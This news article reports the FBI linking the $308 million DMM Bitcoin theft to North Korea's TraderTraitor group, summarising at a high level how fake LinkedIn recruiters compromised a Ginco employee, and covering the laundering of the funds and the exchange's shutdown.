FBI Links DMM Bitcoin Hack to North Korean TraderTraitor Group

The latest investigation suggests that North Korean hackers, known as the TraderTraitor group, were behind the Japanese crypto exchange DMM Bitcoin hack. The TraderTraitor hackers reportedly have close ties with the infamous Lazarus Group.

Back in May, the incident saw the exchange lose 4,502 Bitcoin, valued at $308 million.

The Hack That Caused DMM Bitcoin to Shutdown

The DMM Bitcoin exploit was one of the largest crypto hacks of the year. The significant losses and failed retrieval efforts ultimately caused the exchange to shut down earlier this month.

Initially, the attack was linked to the infamous Lazarus group, but US and Japanese officials now believe a more niche North Korean group, called the TraderTraitor group, was behind the attack.

According to the FBI, the hackers used advanced social engineering techniques to target Ginco, a Japanese crypto wallet company. In March, they posed as recruiters on LinkedIn and sent a malicious link disguised as a pre-employment test hosted on GitHub.

Unfortunately, a Ginco employee unknowingly executed the code, compromising their GitHub account. Subsequently, the hackers exploited the stolen information.

By May, they impersonated the Ginco employee to infiltrate Ginco’s communication systems. This allowed them to manipulate a legitimate transaction request from a DMM Bitcoin employee. As a result, the attackers transferred the stolen Bitcoin to wallets they controlled.

Despite efforts to compensate users by purchasing replacement Bitcoin, the financial impact proved insurmountable. Ultimately, the company announced its closure and plans to transfer its accounts to SBI VC Trade by March 2025.

North Korea Continues to be a Persistent Threat for the Crypto Industry

Meanwhile, this attack highlights the persistent threat of North Korean hacking groups. In 2024 alone, these groups were responsible for stealing $1.34 billion in cryptocurrency, accounting for two-thirds of all crypto thefts globally.

Amount of Cryptocurrencies Stolen by North Korean Hackers Over the Years. Source: Chainalysis

In July, the stolen funds were laundered through Huione Guarantee, a company operating in Cambodia. According to Chainanalysis, the Cambodian company has committed several pig butchering operations estimated around $49 billion.

In December, Cambodia responded with a regulatory crackdown, as the country blocked access to 16 crypto exchanges. This included major platforms like Binance, Coinbase, and OKX.

“Crypto folks (hopefully) already know that Lazarus is one of the most prevalent threat actors targeting this industry. They rekt more people, companies, protocols than anyone else. But it’s good to know exactly how they get in. Because another smart contract audit won’t save you,” wrote Metamask security expert Taylor Monahan.

Overall, the DMM Bitcoin breach ranks as one of Japan’s largest crypto thefts, second only to the $530 million Coincheck hack in 2018.

Related news